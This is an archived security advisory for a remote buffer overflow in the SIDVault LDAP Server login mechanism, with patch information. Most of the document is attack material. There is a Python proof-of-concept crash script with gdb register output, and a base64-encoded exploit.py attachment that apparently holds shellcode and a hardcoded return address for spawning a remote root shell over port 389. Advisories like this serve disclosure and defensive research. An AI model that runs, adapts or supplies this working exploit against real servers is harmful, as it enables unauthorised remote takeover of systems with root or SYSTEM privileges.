AOH :: HP Unsorted S :: TB12298.HTM

SIDVault LDAP Server Remote Buffer Overflow



SIDVault LDAP Server Remote Buffer Overflow
SIDVault LDAP Server Remote Buffer Overflow




--=-fudtU7ez9UKBCv7MKoFd
Content-Type: multipart/mixed; boundary="=-jXl88blkrAjQ/BczmKHP"


--=-jXl88blkrAjQ/BczmKHP
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

SIDVault LDAP Server Remote Buffer Overflow
==========================================
Product Description:

SIDVault LDAP Server for Win32 and GNU/Linux

SIDVault is a Simple Integration Database, allowing easy management and
installations with high performance LDAP v3 server. It supports any
number of schemas, easy to add/modify existing schemas, integrated web
based user access, and fast browser based administration tools. Supports
all relevant RFC protocols LDAP v2, LDAP v3, HTTP, ILS. 

Vulnerable versions:

	Win32 2.0e
	Linux 2.0d

Vulnerability Details:

The login mechanism is prone to multiple buffer-overflow vulnerabilities
because it fails to adequately bounds-check user-supplied input before
copying it to an insufficiently sized buffer.

Successfully exploiting the issue will allow an attacker to execute
arbitrary code with root or SYSTEM-level privileges depending on the
operative system target. Failed exploit attempts will result in a
denial-of-service condition. 

Proof of concept:

# gdb /usr/local/sidvault/sidvault
(...)
(gdb) r -run

In another terminal:

$ cat poc.py
import ldap

l = ldap.open("localhost")
l.simple_bind("dc=" + "A"*4099, "B"*256)
$ ./poc.py

In the first terminal:

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1226736720 (LWP 5942)]
0x41414141 in ?? ()
(gdb) where
#0  0x41414141 in ?? ()
#1  0x41414141 in ?? ()
(...)
Quit
(gdb) i r
eax            0x8202c48        136326216
ecx            0x0      0
edx            0xb6e164df       -1226742561
ebx            0x41414141       1094795585
esp            0xb6e16500       0xb6e16500
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141

Exploit:

An exploit for Debian based distributions which spawns a remote root
terminal has been writen. See the attached exploit.

Patch information:

The problem is solved in the latest version (2.0f) which is available in
the vendor's website at http://www.alphacentauri.co.nz/. 

Thanks:

Thanks to Lynden Sherriff from Alphacentauri Ltd., he where very kind
and professional.

Disclaimer:

The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind. 

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.

Contact:

Joxean Koret - joxeankoret[at]yahoo[dot]es


--=-jXl88blkrAjQ/BczmKHP
Content-Disposition: attachment; filename=exploit.py
Content-Type: text/x-python; name=exploit.py; charset=UTF-8
Content-Transfer-Encoding: base64

IyEvdXNyL2Jpbi9weXRob24NCg0KIiIiDQpBbHBoYSBDZW50YXVyaSBTb2Z0d2FyZSBTSURWYXVs
dCBMREFQIFNlcnZlciByZW1vdGUgcm9vdCBleHBsb2l0ICgwZGF5cykNCiIiIg0KDQppbXBvcnQg
c3lzDQppbXBvcnQgc29ja2V0DQoNCnNjICA9ICJceGViXHgwM1x4NTlceGViXHgwNVx4ZThceGY4
XHhmZlx4ZmZceGZmXHg0Zlx4NDlceDQ5XHg0OVx4NDlceDQ5Ig0Kc2MgKz0gIlx4NDlceDUxXHg1
YVx4NTZceDU0XHg1OFx4MzZceDMzXHgzMFx4NTZceDU4XHgzNFx4NDFceDMwXHg0Mlx4MzYiDQpz
YyArPSAiXHg0OFx4NDhceDMwXHg0Mlx4MzNceDMwXHg0Mlx4NDNceDU2XHg1OFx4MzJceDQyXHg0
NFx4NDJceDQ4XHgzNCINCnNjICs9ICJceDQxXHgzMlx4NDFceDQ0XHgzMFx4NDFceDQ0XHg1NFx4
NDJceDQ0XHg1MVx4NDJceDMwXHg0MVx4NDRceDQxIg0Kc2MgKz0gIlx4NTZceDU4XHgzNFx4NWFc
eDM4XHg0Mlx4NDRceDRhXHg0Zlx4NGRceDQxXHgzM1x4NGJceDRkXHg0M1x4MzUiDQpzYyArPSAi
XHg0M1x4NDRceDQzXHg0NVx4NGNceDU2XHg0NFx4MzBceDRjXHg0Nlx4NDhceDU2XHg0YVx4NDVc
eDQ5XHg0OSINCnNjICs9ICJceDQ5XHgzOFx4NDFceDRlXHg0ZFx4NGNceDQyXHg1OFx4NDhceDU5
XHg0M1x4NDRceDQ0XHg1NVx4NDhceDM2Ig0Kc2MgKz0gIlx4NGFceDM2XHg0MVx4MzFceDRlXHgz
NVx4NDhceDQ2XHg0M1x4MzVceDQ5XHg1OFx4NDFceDRlXHg0Y1x4NTYiDQpzYyArPSAiXHg0OFx4
NTZceDRhXHg1NVx4NDJceDQ1XHg0MVx4NTVceDQ4XHgzNVx4NDlceDQ4XHg0MVx4NGVceDRkXHg0
YyINCnNjICs9ICJceDQyXHg0OFx4NDJceDRiXHg0OFx4NDZceDQxXHg0ZFx4NDNceDRlXHg0ZFx4
NGNceDQyXHg0OFx4NDRceDM1Ig0Kc2MgKz0gIlx4NDRceDU1XHg0OFx4NDVceDQzXHg1NFx4NDlc
eDM4XHg0MVx4NGVceDQyXHg0Ylx4NDhceDM2XHg0ZFx4NGMiDQpzYyArPSAiXHg0Mlx4MzhceDQz
XHgzOVx4NGNceDQ2XHg0NFx4MzBceDQ5XHg1NVx4NDJceDRiXHg0Zlx4NDNceDRkXHg0YyINCnNj
ICs9ICJceDQyXHgzOFx4NDlceDU0XHg0OVx4NDdceDQ5XHg0Zlx4NDJceDRiXHg0Ylx4NTBceDQ0
XHgzNVx4NGFceDQ2Ig0Kc2MgKz0gIlx4NGZceDMyXHg0Zlx4NDJceDQzXHg1N1x4NGFceDQ2XHg0
YVx4MzZceDRmXHgzMlx4NDRceDU2XHg0OVx4MzYiDQpzYyArPSAiXHg1MFx4NDZceDQ5XHgzOFx4
NDNceDRlXHg0NFx4NDVceDQzXHgzNVx4NDlceDU4XHg0MVx4NGVceDRkXHg0YyINCnNjICs9ICJc
eDQyXHg0OFx4NWEiDQoNCiMNCiMgVGhlIGFkZHJlc3Mgd2Ugd2lsbCB1c2UgaXMgMHhmZmZmZTc3
NyAoSk1QIEVTUCBpbiBVYnVudHUncyBsaW51eC1nYXRlLnNvKQ0KIw0KYWRkciA9ICJceDc3XHhl
N1x4ZmZceGZmIg0KDQp0aGVMaW5lID0gJ1x4OTAnKjIwNzYgKyBhZGRyKyAnXHg5MCcqKDIwMTkt
bGVuKHNjKSkgKyBzYw0KDQpwa3QgID0gJzBceDgyXHgxMC9ceDAyXHgwMVx4MDFjXHg4Mlx4MTAo
XHgwNFx4ODJceDEwXHgwNmRjPScNCnBrdCArPSB0aGVMaW5lDQpwa3QgKz0gJ1xuXHgwMVx4MDJc
blx4MDFceDAwXHgwMlx4MDFceDAwXHgwMlx4MDFceDAwXHgwMVx4MDFceDAwXHg4N1x4MGJvYmpl
Y3RDbGFzczBceDAwJw0KDQpzID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0
LlNPQ0tfU1RSRUFNKQ0Kcy5jb25uZWN0KChzeXMuYXJndlsxXSwgMzg5KSkNCnMuc2VuZChwa3Qp
DQpzLmNsb3NlKCkNCg=

--=-jXl88blkrAjQ/BczmKHP--

--=-fudtU7ez9UKBCv7MKoFd
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQBG0M5CU6rFMEYDrlERAhaRAJwPyQkYFyNn3YuAmOH8QgScc1NZOwCgj0//
0Rs5w4FXjqcSB4tS0wKjofI=6Wck
-----END PGP SIGNATURE-----

--=-fudtU7ez9UKBCv7MKoFd--


		
______________________________________________ 
LLama Gratis a cualquier PC del Mundo. 
Llamadas a fijos y móviles desde 1 céntimo por minuto. 
http://es.voice.yahoo.com 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.